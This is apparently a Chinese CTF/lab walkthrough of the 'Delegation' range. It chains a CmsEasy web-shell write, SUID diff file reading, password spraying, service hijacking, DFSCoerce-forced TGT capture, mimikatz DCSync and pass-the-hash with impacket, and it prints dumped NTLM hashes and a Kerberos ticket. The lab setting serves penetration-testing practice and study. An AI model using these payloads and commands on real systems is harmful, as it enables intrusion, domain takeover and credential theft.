春秋云境 Delegation

flag01

39.101.173.163:22 open
39.101.173.163:80 open
39.101.173.163:3306 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.101.173.163     code:200 len:68112  title:中文网页标题

CmsEasy 7.3.8 本地文件包含漏洞 - ListSec

POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.101.173.163
Content-Length: 77
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded;
Cookie: PHPSESSID=os9kli93e59pjclq4361kaairm; loginfalse74c6352c5a281ec5947783b8a186e225=1; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313

sid=#data_d_.._d_.._d_.._d_2.php&slen=693&scontent=<?=eval($_POST["1"]);?>

写入shell之后访问/2.php即可，连接蚁剑

find / -perm -u=s -type f 2>/dev/null

/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/at
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

diff提权

diff --line-format=%L /dev/null /home/flag/flag01.txt

拿到hint

WIN19\Adrian

flag02

拿rockyou爆破一波WIN19，先搭建代理，扫描内网

172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.36:21 open
172.22.4.45:139 open
172.22.4.36:80 open
172.22.4.36:3306 open
172.22.4.36:22 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.7:88 open
[*] NetBios: 172.22.4.45     XIAORANG\WIN19                 
[*] NetInfo:
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetBios: 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393 
[*] 172.22.4.7  (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetBios: 172.22.4.7      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] NetInfo:
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] WebTitle: http://172.22.4.36        code:200 len:68100  title:中文网页标题
[*] WebTitle: http://172.22.4.45        code:200 len:703    title:IIS Windows Server

SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:babygirl1 STATUS_PASSWORD_EXPIRED

爆出来这么个东西，有了之前的经验，知道要改密码了

proxychains4 rdesktop 172.22.4.45

改完密码rdp上去，在桌面上可以找到一个风险文件

可以修改注册表

修改注册表，然后cmd启动进程，注意这个执行是有时间限制的，比如你执行一个shell，他只有30秒的时间限制，过了这个时间进程也没了

sc start gupdate

正向连接上线拿到flag

type c:\Users\Administrator\flag\flag02.txt

flag03

查询域内设置了非约束委派的机器账户:

AdFind -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

发现有WIN19，并且我们控制的正好是WIN19，且有system权限，那么后面的就很明确了，先让WIN19监听

Rubeus.exe monitor /interval:2 /filteruser:DC01$ >hash.txt

利用强认证漏洞强制DC访问WIN19，拿到其TGT票据

python dfscoerce.py -u "WIN19$" -hashes :afd9423130654e89e67dc53032d26928 -d xiaorang.lab WIN19 172.22.4.7

强制访问后hash.txt里面就会出现b64的TGT票据，然后导入票据

Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6KgcRtvscd/DIgXDFIVpBECG+5SBjjdmbEiHmHjAJVi3ZBX6mnDPpfPn5NDZGVO4j0vABRg+aa5U7ZbjceUVDzK24UQK5nE7WJ1YVLHyooOPxpWC2IOAfOGBPmle7HK5JNcyaCaTdASEK04nBwQv1UamoxWNQfOVAZcNKDt3Npg3OOAhHU0HyCdQQXFZkJWs6EnPHGtUm3YGn4rx5NkvjQjCgp2fodDeOyF/cRo4e63hdNA5qvysONb8OnmFdRe0OaH4o4zDNv+aD6Yl45eoAXLLFGe6R3W+9HJetYk/qnQx/GGXPpzhePf24J1xOLWPk3Wv350/AgNYO+/tMU3eGRyfW6sFHOGhZNlWCO5vGgmF9WlGz46+pvZjrFIfMvJ3wQ9U1cUUg9uACgTwARbhNywCWoZg9K7osCmwHM0oKHThVdei1IFPjmRsXBJqMiuhxEcTifAYybrROfvBtA+HPlArE7GFMi6/0EDqzUPEikaUMYuVhGCaG3+S1QeUlNz7T6BML/X7KKQbQUuCjaKy2tFffjetr/41pDQByHT/7hIzNenwrBlwiSiXlF5sPiAq6tVajRmfHpKlTdS9LIygbMaKPSCweJtMrTZVFAOmsyRnWcFgPNacxeCX2htGGdXbA2YNj4rO+kgLWgXz/M0PPMN8GmX5NivuTxXoCmDzarauwrIKFtmFcpAQ/P6L8JP++B3RqyVV2GN9XUXEq6Muf7riTI+IoySRXvqD5pnp0HcHEoeaKjUq24rUbBWTTMQ1SDMaBaKY3rcy79zyKDeYI2v2vhMjRF8lvtNUgW7ix99t0rSCwCSRIwE8mPt3dQAF35HPvMvs0zq253bij2gixCKBLLCHQJHmexBDgggt+GoZwicEUf/QiyZG96YijlyG+odyOCCZ0D927JUpsLK65bhN2IV0oNd3sfjbgwI0ugXfFzTkzrn+qlzd93mW84KeUut5bqsKuc90ymkIqqF9iTGJSlwDqWXOTWOwttcw+/IiMoGJSEctdjZ+6WWSjkhXtXLp5R7QAOJ3zIKyDwnzbCtKmXOAY/tHaUoHHPkEPvWciaf9p1Ap1MKfEGUmp9JsJbveQLfS0SR1hh0xgtDZG6MeMmq1hKGj5V/aeKy5+O4xpJpmrHRTExuJ++aNQbzEQS4xL/cMvRBLwWkLetJRQ3OKr60hPcQPZw43ZTMvAQZc53fGy6aYUSXKD5A6cMEbcEli3QAOl5f8dHm7L40cHcNW2J/nnvcOEdG5cYpg8h7366INTtQeia+gTsI8lFpIuIq6aZkerV3NqX7MD2YHQAD4njpw7Ijhj4wA+3mBCjTOPFRHQI7NwUeLTOw7fEEtK6pT0IsIph6vaEBxQv5H4moKweE2r6eELrooOR8YcxrVA025bSoGH1fxT0nYev5AcYWy+YiM/KAuW80uh2uX8uE7Dwx5GnskjzLUds0iCjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCA7fqNz2H6UReJNgOy2IsNEDG9lAJebzDkz3AJrUqSrm6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI0MDgyMDE2MDIwMVqmERgPMjAyNDA4MjEwMjAyMDFapxEYDzIwMjQwODI3MTYwMjAxWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

dump哈希

mimikatz "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

结果如下

[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  767e06b9c74fd628dd13785006a9092b        514
1105    Aldrich 98ce19dd5ce74f670d230c7b1aa016d0        512
1106    Marcus  b91c7cc463735bf0e599a2d0a04df110        512
1112    WIN-3X7U15C2XDM$        c3ddf0ffd17c48e6c40e6eda9c9fbaf7        4096
1113    WIN-YUUAW2QG9MF$        125d0e9790105be68deb6002690fc91b        4096
1000    DC01$   79a05cdbf202947eeb0e56e4f93a806e        532480
500     Administrator   4889f6553239ace1f7c47fa2c619c252        512
1103    FILESERVER$     5f0f887110fb5c4fd14d34297e8d1dfd        4096
1104    WIN19$  afd9423130654e89e67dc53032d26928        528384

横向19

proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/administrator@172.22.4.19 -codec gbk

type c:\users\administrator\flag\flag03.txt

flag04

proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/administrator@172.22.4.7 -codec gbk

type c:\users\Administrator\flag\flag04.txt